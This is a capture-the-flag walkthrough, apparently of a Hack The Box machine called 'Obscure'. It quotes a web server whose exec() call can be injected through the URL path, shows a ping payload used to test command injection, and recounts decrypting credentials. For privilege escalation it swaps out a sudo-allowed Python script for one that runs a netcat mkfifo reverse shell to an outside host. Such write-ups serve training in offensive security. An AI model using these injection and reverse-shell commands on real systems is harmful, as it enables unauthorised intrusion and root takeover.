From Nmap ports 22,80 and 8080 are open. port 80 does nothing. port 8080 is a web server, and is a custom webserver. At the home page of the website there is a message which says Message to server devs: the current source code for the web server is in 'SuperSecyreServer.py' in the secret development directory.
I run wfuzz to find the dir only because I already know the filename.
def serveDoc(self, path, docRoot): path = urllib.parse.unquote(path) try: info = "output = 'Document: {}'" # Keep the output for later debug exec(info.format(path)) # This is how you do string formatting, right? cwd = os.path.dirname(os.path.realpath(__file__)) docRoot = os.path.join(cwd, docRoot) if path == "/": path = "/index.html" requested = os.path.join(docRoot, path[1:]) if os.path.isfile(requested): mime = mimetypes.guess_type(requested) mime = (mime if mime[0] != None else "text/html") mime = MIMES[requested.split(".")[-1]] try: with open(requested, "r") as f: data = f.read() except: with open(requested, "rb") as f: data = f.read() status = "200" else: errorPage = os.path.join(docRoot, "errors", "404.html") mime = "text/html" with open(errorPage, "r") as f: data = f.read().format(path) status = "404"
The path gets inside the exec function. So If I send inside the path something like /';os.system("ping IP");' given that the os library is already imported by the script I get code execution? Let’s try to send that but encoded.
I use https://www.urlencoder.org/ and encode this command ';os.system("ping 10.10.14.81");' and on my box I listen for any ping request using tcpdump -i tun0 -n icmp
I immediately get a request back.
1 2 3 4
root@kali:~/Downloads# tcpdump -i tun0 -n icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 16:24:49.507887 IP 10.10.14.81 > 10.10.10.168: ICMP echo request, id 9799, seq 106, length 64
I get a reverse shell, inside /home/robert folder I find a python script which encrypts and decrypts files and some files. I type this command and get a password. python3 SuperSecureCrypt.py -i out.txt -o /tmp/d.txt -k "$(cat check.txt)" -d the password is alexandrovich, now I decrypt the passwordreminder with this password. the command is python3 SuperSecureCrypt.py -i passwordreminder.txt -o /tmp/a.txt -k "alexandrovich" -d
I use this password to ssh into the box, as robert user.
Root
After a bit of enumerating inside the box, I finally find that I can run this python script as root.
1 2 3 4 5 6 7 8
robert@obscure:~$ sudo -l Matching Defaults entries for robert on obscure: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User robert may run the following commands on obscure: (ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py robert@obscure:~$
I can rename that folder to something else and then create the folder with the same name and the python script with the same name, and then execute the command to get a reverse shell.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
robert@obscure:~$ cd BetterSSH/ robert@obscure:~/BetterSSH$ ls -la total 12 drwxr-xr-x 2 root root 4096 Dec 2 09:47 . drwxr-xr-x 7 robert robert 4096 Dec 2 09:53 .. -rwxr-xr-x 1 root root 1805 Oct 5 13:09 BetterSSH.py robert@obscure:~/BetterSSH$ cd .. robert@obscure:~$ mv BetterSSH/ a robert@obscure:~$ mkdir BetterSSH robert@obscure:~$ cd BetterSSH/ robert@obscure:~/BetterSSH$ touch BetterSSH.py robert@obscure:~/BetterSSH$ vim BetterSSH.py robert@obscure:~/BetterSSH$ cat BetterSSH.py import os os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.81 7979 >/tmp/f") robert@obscure:~/BetterSSH$ sudo -u root /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py